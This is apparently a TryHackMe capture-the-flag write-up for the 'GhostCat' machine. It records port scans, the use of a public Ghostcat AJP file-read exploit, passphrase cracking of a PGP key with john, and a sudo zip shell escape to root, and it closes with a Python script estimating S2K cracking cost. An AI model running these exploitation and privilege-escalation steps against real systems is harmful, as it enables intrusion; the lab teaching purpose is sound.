![[Pasted image 20250628204121.png]]

---

# Information Gathering - Nmap

Started off by scanning all TCP ports and found four open ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 18:40 CDT
Nmap scan report for 10.10.206.88
Host is up (0.13s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
8009/tcp open  ajp13
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 23.47 seconds
```

Ran a script and version scan (`-sC -sV`) against the four open ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sC -sV $IP -p 22,53,8009,8080
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 18:46 CDT
Nmap scan report for 10.10.206.88
Host is up (0.13s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.81 seconds
```

Performed a UDP scan against the top 1,000 ports; no open ports were found.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 18:47 CDT
Nmap scan report for 10.10.206.88
Host is up (0.13s latency).
Not shown: 995 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
623/udp   closed asf-rmcp
657/udp   closed rmc
2002/udp  closed globe
19722/udp closed unknown
27892/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds
```

---

# Footprinting

HTTP on port 8080 serves the Apache Tomcat default page. I have seen some machines expose the manager app, but this one doesn't. I couldn't find any juicy information on this port, and `Gobuster` didn't reveal any interesting directories either.

![[Pasted image 20250628193413.png]]

Moved on to `searchsploit` to see whether it has any known vulnerabilities for `ajp13` / `Apache Jserv`, and it did! The first result doesn't fit what we are looking for, so I'm going to use the Python exploit.

![[Pasted image 20250628191614.png]]

The exploit requires a target argument.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ python3 48143.py
usage: 48143.py [-h] [-p PORT] [-f FILE] target
48143.py: error: the following arguments are required: target
```

It returned a file from `ajp13://10.10.206.88:8009/asdf`; notice at the bottom that it includes a set of credentials!

```xml
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ python2 48143.py $IP
Getting resource at ajp13://10.10.206.88:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
       skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
```

# Exploit

I tried the credentials I had just found on the SSH server, because I couldn't find anywhere else to use them during the enumeration phase, and I successfully logged in.

![[Pasted image 20250628193330.png]]

Found the `user.txt` flag!

```bash
skyfuck@ubuntu:/home/merlin$ cat user.txt
THM{Ghos...
```

---

# Privilege Escalation

In `/home/skyfuck` there are two files of interest, `credential.pgp` and `tryhackme.asc`.

```bash
skyfuck@ubuntu:~$ ls -la
total 40
drwxr-xr-x 3 skyfuck skyfuck 4096 Jun 28 17:33 .
drwxr-xr-x 4 root    root    4096 Mar 10  2020 ..
-rw------- 1 skyfuck skyfuck  136 Mar 10  2020 .bash_history
-rw-r--r-- 1 skyfuck skyfuck  220 Mar 10  2020 .bash_logout
-rw-r--r-- 1 skyfuck skyfuck 3771 Mar 10  2020 .bashrc
drwx------ 2 skyfuck skyfuck 4096 Jun 28 17:33 .cache
-rw-rw-r-- 1 skyfuck skyfuck  394 Mar 10  2020 credential.pgp
-rw-r--r-- 1 skyfuck skyfuck  655 Mar 10  2020 .profile
-rw-rw-r-- 1 skyfuck skyfuck 5144 Mar 10  2020 tryhackme.asc
```

A `.pgp` file is usually a file that has been encrypted with PGP (**Pretty Good Privacy**). PGP protects the contents of a file so that only authorized people can read it. To decrypt a `.pgp` file we can use `gpg` (GnuPG), but we need the matching private key; in our case, `tryhackme.asc` appears to be that private key.
```bash
skyfuck@ubuntu:~$ cat tryhackme.asc | head
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG v1.63

lQUBBF5ocmIRDADTwu9RL5uol6+jCnuoK58+PEtPh0Zfdj4+q8z61PL56tz6YxmF
3TxA9u2jV73qFdMr5EwktTXRlEo0LTGeMzZ9R/uqe+BeBUNCZW6tqI7wDw/U1DEf
StRTV1+ZmgcAjjwzr2B6qplWHhyi9PIzefiw1smqSK31MBWGamkKp/vRB5xMoOr5
ZsFq67z/5KfngjhgKWeGKLw4wXPswyIdmdnduWgpwBm4vTWlxPf1hxkDRbAa3cFD
B0zktqArgROuSQ8sftGYkS/uVtyna6qbF4ywND8P6BMpLIsTKhn+r2KwLcihLtPk
V0K3Dfh+6bZeIVam50QgOAXqvetuIyTt7PiCXbvOpQO3OIDgAZDLodoKdTzuaXLa
cuNXmg/wcRELmhiBsKYYCTFtzdF18Pd9cM0L0mVy/nfhQKFRGx9kQkHweXVt+Pbb
```

`gpg` is also installed on the server.

```bash
skyfuck@ubuntu:~$ which gpg
/usr/bin/gpg
```

Before trying to decrypt the file, we need to import the private key.

```bash
skyfuck@ubuntu:~$ gpg --import tryhackme.asc
gpg: key C6707170: secret key imported
gpg: /home/skyfuck/.gnupg/trustdb.gpg: trustdb created
gpg: key C6707170: public key "tryhackme <[email protected]>" imported
gpg: key C6707170: "tryhackme <[email protected]>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
```

After importing the private key, I tried decrypting the file, but it requires a passphrase :(

```bash
skyfuck@ubuntu:~$ gpg --output decrypted.txt --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <[email protected]>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
Enter passphrase:
```

I transferred the private key to my local Kali box to crack it and recover the passphrase with `john the ripper`.

![[Pasted image 20250628201449.png]]

John the Ripper ships a tool called `gpg2john` that converts the PGP private key into a hash in john's `$gpg$` format, which john can then crack.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gpg2john tryhackme.asc > tryhackmehash

File tryhackme.asc

┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat tryhackmehash
tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme <[email protected]>::tryhackme.asc
```

Cracked!

![[Pasted image 20250628202741.png]]

Finally decrypted the `credential.pgp` file, and it contained a credential.

```bash
skyfuck@ubuntu:~$ gpg --output decrypted --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <[email protected]>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <[email protected]>"
skyfuck@ubuntu:~$ ls
credential.pgp  decrypted  tryhackme.asc
skyfuck@ubuntu:~$ cat decrypted
merlin:asuy...
```

Successfully logged in as `merlin` with the credentials found!

```bash
skyfuck@ubuntu:~$ su merlin
Password:
merlin@ubuntu:/home/skyfuck$ whoami
merlin
```

`sudo -l` reveals that merlin can run `/usr/bin/zip` as root via sudo, without a password.

```bash
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
```

Whenever `sudo -l` returns something, I immediately check `gtfobins.github.io` to see whether the listed binary is there. Luckily, `/usr/bin/zip` is. To summarize what the command does: it picks a throwaway archive name, then runs `zip` as root with the archive test option (`-T`) and `-TT`, which replaces the test command with a shell, so that shell runs as root.

![[Pasted image 20250628203831.png]]

Got a shell as `root`!
```bash
merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# whoami
root
```

Got the `root.txt` flag :)

```bash
# cd /root
# cat root.txt
THM{Z1P_...
```
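Why the key's passphrase fell so quickly, as an added example that is not from the write-up or from john: this parses the `$gpg$` line that `gpg2john` produced above into its S2K (string-to-key) parameters, following the field order of john's gpg format, and estimates the hashing work a cracker spends per guess. The hash line is copied from the output above with the trailing uid and filename fields dropped; the comparison against the largest S2K count OpenPGP can encode is my own.

```python
# Field order of john's $gpg$ format as emitted by gpg2john:
#   $gpg$*algo*datalen*bits*data*spec*usage*hash*cipher*ivlen*iv*count*salt
PUBKEY_ALGOS = {1: "RSA", 16: "Elgamal", 17: "DSA"}
HASH_ALGOS = {1: "MD5", 2: "SHA-1", 8: "SHA-256", 10: "SHA-512"}
CIPHER_ALGOS = {3: "CAST5", 7: "AES-128", 8: "AES-192", 9: "AES-256"}
S2K_SPECS = {0: "simple", 1: "salted", 3: "iterated+salted"}
MAX_S2K_COUNT = 65011712  # largest count the OpenPGP coded S2K byte (0xff) can express
SHA1_BLOCK = 64           # bytes consumed per SHA-1 compression call

# The line gpg2john printed for tryhackme.asc above (uid and filename fields dropped).
HASH_LINE = (
    "tryhackme:$gpg$*17*54*3072*"
    "713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06"
    "f482e9770c710abc2903f1ed70af6fcc22f5608760be"
    "*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480"
)


def sha1_blocks_per_guess(count):
    """Iterated S2K feeds `count` bytes of (salt + passphrase, repeated) through
    the hash, so one passphrase guess costs roughly count/64 SHA-1 compressions."""
    return -(-count // SHA1_BLOCK)


def parse_gpg_hash(line):
    """Split a gpg2john line into named S2K parameters plus a per-guess cost estimate."""
    login, h = line.split(":", 1)
    f = h.split("*")
    if f[0] != "$gpg$" or len(f) < 13:
        raise ValueError("not a $gpg$ hash line")
    algo, datalen, bits = int(f[1]), int(f[2]), int(f[3])
    spec, usage, halg, calg = int(f[5]), int(f[6]), int(f[7]), int(f[8])
    ivlen, count = int(f[9]), int(f[11])
    return {
        "login": login,
        "key": f"{PUBKEY_ALGOS.get(algo, algo)} {bits}-bit ({datalen} encrypted bytes)",
        "s2k": S2K_SPECS.get(spec, spec),
        "hash": HASH_ALGOS.get(halg, halg),
        "cipher": CIPHER_ALGOS.get(calg, calg),
        "sha1_checksum": usage == 254,  # usage 254 = SHA-1 checksum over the secret MPIs
        "count": count,
        # Sanity check: hex field lengths must match the declared data, IV and 8-byte salt sizes.
        "lengths_ok": len(f[4]) == 2 * datalen and len(f[10]) == 2 * ivlen and len(f[12]) == 16,
        "blocks_per_guess": sha1_blocks_per_guess(count),
        # How many times cheaper each guess is than with the strongest encodable count.
        "cheaper_than_max": sha1_blocks_per_guess(MAX_S2K_COUNT) // sha1_blocks_per_guess(count),
    }


if __name__ == "__main__":
    for k, v in parse_gpg_hash(HASH_LINE).items():
        print(f"{k:>17}: {v}")
```

With only about a thousand SHA-1 blocks per guess, the cost of the crack is set almost entirely by passphrase quality; newer GnuPG calibrates the S2K count upward by default, and `--s2k-count` lets you raise it explicitly when generating or re-protecting a key.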